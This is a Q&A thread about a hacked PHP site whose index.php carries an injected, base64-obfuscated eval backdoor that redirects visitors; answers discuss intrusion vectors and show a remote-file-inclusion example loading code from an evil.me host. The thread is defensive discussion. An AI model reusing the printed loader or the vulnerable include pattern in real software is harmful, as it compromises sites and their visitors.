tags:

views:

406

answers:

9

I just checked my site it suddenly jumps me to this site:

xxxp://www1.re*******3.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfaFbVoKDb2YmHWJjOxaCbkXp%2FWqyopHaYXsiaY2eRaGNpnFPVpJHaotahiaJ0WKrO1c%2Beb1qfnaSZdV%2FXlsndblaWpG9plmGQYWCcW5eakWppWKjKx6ChpqipbmdjpKjEjtDOoKOhY56n1pLWn1%2FZodXN02BdpqmikpVwZWpxZGxpcV%2FVoJajYmJkZ2hwlGGXaVbJkKC0q1eum5qimZxx

I found out that in the first line of my index.php file, that looks like this:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHR/*

Snip

*/DkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>

How do I stop this? thanks!

UPDATE: What kind of attack is this? is this really xss? No one really knows about my ftp password.

A: 

Just remove this line, and patch your server up. Most likely you are infected by backdoor.

TBH
+1  A: 

Remove the line of code?

This is an attack on your server that allowed the attacker to alter the server files. This can be through folder permissions (having a 777 permission is bad), or if you allow your scripts to alter other scripts on your server.

You might want to look over your folder permissions.

Chacha102
yeah, I have it removed. SO far my site is working properly. But I have the feeling that there will another attack.
jun
@jun: you are guaranteed another attack. If you haven't plugged the hole, then you are guaranteed they'll do it again.
Chris Lively
A: 

Most people stop code injection attacks by removing the viral code first, and then making all PHP files read only while looking for the exploit that the attack used to write to your PHP files.

Earlz
What on earth is making the files read-only going to do? If *you* have the permissions necessary to make them read only, and *your* account was compromised, then whatever got to the files can *remove* the read-only attribute.
George Edison
@Geor I was assuming that PHP doesn't run under the same account as the regular user. For instance, most of the time there is a very limited httpd user that is used by PHP and then you(regular/FTP user) retain ownership over the PHP files and can mark them readonly and whatnot
Earlz
Which btw, is how it **should** be setup for security
Earlz
@Earlz: I agree. What I am saying is that the FTP account was likely compromised and in that case making the files read only does nothing.
George Edison
+7  A: 

Someone has access (not through xss or sql-injection) to your php files on your server. If this is a shared server it is very possible that the entire server was compromised somehow. You can remove that crap at the top of your php files, and make them read-only. However, as I'm guessing this is a shared server, if your web host doesn't fix the security flaw that allowed this in the first place, it may not be enough. Talk to your hosting provider (personally I'd just move to a new provider, this is a good sign that these guys are hopeless.)

Eloff
yeah, I am on a shared server.
jun
A: 

Most of time it's ftp passwords stolen from the developer's PC by some trojan program

Col. Shrapnel
and evidence for this statement?
Malfist
omg you are free not to trust me.
Col. Shrapnel
@Col. Shrapnel, we certainly are. But we're all interested in this stuff, so if you know of an interesting or relevant article that backs up your statement, we'd be interested in reading it. Plus it's always nice to cite one's sources (however often we, and especially *I*, don't)... =)
David Thomas
well I don't have any. First time I've heard that on the local forum, and then my own experience.
Col. Shrapnel
"most of the time"? no! sometimes? yes!
hasen j
+1  A: 

Secure your server, try contacting the relevant people, the server seems to have been compromised.

Sarfraz
+1  A: 

What kind of attack is this? is this really xss? No one really knows about my ftp password.

There are several vectors for this kind of attack:

Software vulnerability. This could include outdated PHP, MySQL, Apache or just about anything else running. The entire server may have been comprimised.

Scripting vulnerability. A vulnerability, usually with a widely used PHP application used to upload and execute commands. A common one is in photo gallery software that is tricked into uploading renamed php files, allowing the extension to be renamed on the server from jpg back to the original php, and then run, allowing for any action allowed by scripts (usually a PHP admin/root kit is uploaded this way giving the attacker the ability to freely upload and alter files)

FTP brute force attack. Generally your server should be configured to be able to IP block address that make repeated failed login attempts.

User infection. A relatively new vector of attack, a trojan (most so far use vulnerabilities in the Adobe PDF Reader plugin due the fact that this works in FireFox but any browser exploit that allows code execution will work) to install a trojan onto a passing users computer. The trojan searches the users computer for common FTP programs like Filezilla and Dreamweaver, looking for saved passwords. Once it locates an FTP login it accesses that site from the users own computer and attempts to modify known file types (htm,php,asp,etc), inserting it's own code (most search for the HEAD tag and insert just after that) - the same code that originally infected the users computer. Once it is done it can work like any other trojan (install adware, or stay hidden and make the users computer part of a botnet).

David
A: 

We had the same problem. Really ashamed to admit, but it happened to us because users were able to upload files with any extension and run them on server. So, some user had uploaded php script and executed it. :-)

We've solved problem by setting filters and read-only attributes on uploaded files.

Bar
+3  A: 

If you have open_wrappers = on, and you are using something like this somewhere on the site

http://domain.tld/index.php?page=somenameofpage

Somewhere in index.php (or included files)

<?php

include($page . '.php');

?>

Then somebody could compromise your site by requesting

http://domain.tld/index.php?page=http://evil.me/evilcode.txt?

(value of page should be urlencoded to work - i'm lazy so didn't urlencode it. Note the ? at the end..

What you are now actually including is

http://evil.me/evilcode.txt?.php

-- evilcode.txt --

<?php

echo 'some evil code huh!';

This vil execute the php code in evilcode.txt

A quickfix would be to add a . to the path of the include - like this

include('./' . $page . '.php');

I learned this the hard way.. Became admin of a existing site that used this method for navigation. Took me months to figure it out, eventhough the hacker didn't replaced any code - he just added files in some subfolders. And yeah, he added some backdoors in a .js and .css filse that a users AntiVir picked up.

Phliplip